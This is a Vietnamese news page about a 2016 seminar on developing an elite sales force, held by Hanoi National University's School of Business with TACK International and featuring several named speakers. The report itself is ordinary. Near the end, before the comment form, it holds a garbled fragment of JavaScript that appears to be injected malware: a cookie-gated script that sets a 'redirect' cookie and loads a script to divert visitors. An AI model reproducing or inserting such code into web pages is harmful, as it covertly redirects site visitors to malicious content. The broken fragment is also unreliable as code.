Hội thảo quốc tế

 

hoi thao ban hang tinh nhueGiúp các doanh nghiệp cập nhật và tiếp cận với những kỹ thuật, mô hình, bí quyết quản trị bán hàng hiện đại qua đó có khả năng phát triển lực lượng bán hàng, nâng cao sức cạnh tranh cho doanh nghiệp, Khoa Quản trị và Kinh doanh (HSB) – Đại học Quốc gia Hà Nội đã phối hợp cùng TACK International tổ chức Hội thảo quốc tế với chủ đề “Phát triển lực lượng bán hàng tinh nhuệ” được chủ trì bởi Ông Neil Parry – chuyên gia cao cấp của TACInternational cùng sự tham gia chia sẻ của các CEO thành đạt như Ông Alec Ang – Chủ tịch Công ty RVMS (Singapore) và PGS.TS. Hoàng Đình Phi – Chủ nhiệm Khoa Quản trị và Kinh doanh, Đại học Quốc gia Hà Nội.

 

  

Tổ chức thành công hội thảo quốc tế
“Phát triển đội ngũ bán hàng tinh nhuệ”

Với nhận thức sâu sắc về những thay đổi của lĩnh vực bán hàng và quản trị bán hàng trên thế giới cùng bối cảnh kinh doanh đầy thách thức trong môi trường hội nhập tại Việt Nam, để giúp các doanh nghiệp cập nhật và tiếp cận với những kỹ thuật, mô hình, bí quyết quản trị bán hàng hiện đại qua đó có khả năng phát triển lực lượng bán hàng, nâng cao sức cạnh tranh cho doanh nghiệp, Khoa Quản trị và Kinh doanh (HSB) – Đại học Quốc gia Hà Nội đã phối hợp cùng TACK International tổ chức Hội thảo quốc tế với chủ đề “Phát triển lực lượng bán hàng tinh nhuệ” được chủ trì bởi Ông Neil Parry – chuyên gia cao cấp của TACInternational cùng sự tham gia chia sẻ của các CEO thành đạt như Ông Alec Ang – Chủ tịch Công ty RVMS (Singapore) và PGS.TS. Hoàng Đình Phi – Chủ nhiệm Khoa Quản trị và Kinh doanh, Đại học Quốc gia Hà Nội.
Ngày 10/8/2016, hội thảo đã được tổ chức thành công và thu hút gần 100 chuyên gia, các nhà quản trị bán hàng, giám đốc bán hàng, các doanh nhân trẻ và CEO tới tham dự.

hoi thao ban hang tinh nhue

Gần 100 nhà quản trị bán hàng, doanh nhân trẻ và các CEO ngồi kín khán phòng Chu Văn An, HSB – ĐHQGHN.

Phát biểu khai mạc hội thảo, PGS. TS Hoàng Đình Phi, chủ nhiệm khoa Quản trị và Kinh doanh, nhà sáng lập tập đoàn Sannam Group nhấn mạnh tầm quan trọng của đội ngũ bán hàng trên con đường phát triển và thành công của mỗi doanh nghiệp dựa trên các nghiên cứu mới nhất được thực hiện trong và ngoài nước. Đối với việc phát triển sự nghiệp cá nhân, thầy cho rằng chính các yếu tố kiến tạo nên thành công của người bán hàng chính là các nhân tố quyết định đến thành công của các CEO trong tương lai. Chính vì vậy, để bắt đầu khởi nghiệp, các bạn trẻ nên lựa chọn con đường trở thành người bán hàng xuất sắc để tích lũy kinh nghiệm thị trường và hun đúc những phẩm chất kiến tạo thành công sau này.

hoi thao ban hang tinh nhue 2

PGS. TS Hoàng Đình Phi, Chủ nhiệm khoa Quản trị và Kinh doanh, ĐHQGHN

Tiếp tục chương trình, Ngài Neil Parry – Chuyên gia tư vấn và đào tạo marketing và bán hàng quốc tế, thành viên hội đồng kiểm định chất lượng học viện Quản trị marketing và bán hàng, vương quốc Anh, đã chia sẻ kết quả nghiên cứu mới nhất về các xu hướng bán hàng trên thế giới và giới thiệu mô hình bán hàng kinh điển PRO-PAYBACK Selling được nghiên cứu bởi TACK International và đang được áp dụng tại các tập đoàn lớn quốc tế.

hoi thao ban hang tinh nhue 3

Chuyên gia tư vấn và đào tạo quốc tế – Neil Parry, TACK Internationl, UK

Những chia sẻ bổ ích, cập nhật, có tính ứng dụng cao của chuyên gia Neil Parry được khán thính giả chăm chú lắng nghe và ghi chép.

hoi thao ban hang tinh nhue 4

Tiếp theo chương trình, Chủ tịch hội đồng quản trị tập đoàn giáo dục quốc tế RVMS – Ngài Alec Ang giới thiệu các phong cách chủ đạo của người bán hàng và giúp các nhà quản trị lựa chọn phong cách đội ngũ bán hàng phù hợp với tình hình phát triển của doanh nghiệp, dựa trên mô hình phân tích kinh điển BCG.

hoi thao ban hang tinh nhue 5

Ngài Alec Ang – Chủ tịch HĐQT tập đoàn giáo dục quốc tế RVMS, Singapore

Với mong muốn được lắng nghe, chia sẻ, thảo luận và đưa ra các giải pháp giải đáp các lo âu, trăn trở của các nhà quản trị bán hàng, ban tổ chức trân trọng mời các diễn giả tham dự chuyên mục tọa đàm, giải đáp thắc mắc cho khán thính giả. Chuyên mục tọa đàm nhận được sự hưởng ứng và tham gia hào hứng của cả khán phòng.

hoi thao ban hang tinh nhue 6Chuyên mục tọa đàm diễn ra sôi nổi, ý nghĩa với sự chia sẻ của cả ba vị diễn giả

hoi thao ban hang tinh nhue 7

Ông Phạm Đình Đoàn – Nhà sáng lập, Chủ tịch tập đoàn Phú Thái bắt tay cảm ơn diễn giả

hoi thao ban hang tinh nhue 8

Anh Nguyễn Hoài Nam – học viên lớp MBA 9, giám đốc bán hàng tập đoàn Marubeni Việt Nam
Phát biểu cảm ơn và tặng hoa các diễn giả

{var U=(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’

Trả lời

Email của bạn sẽ không được hiển thị công khai.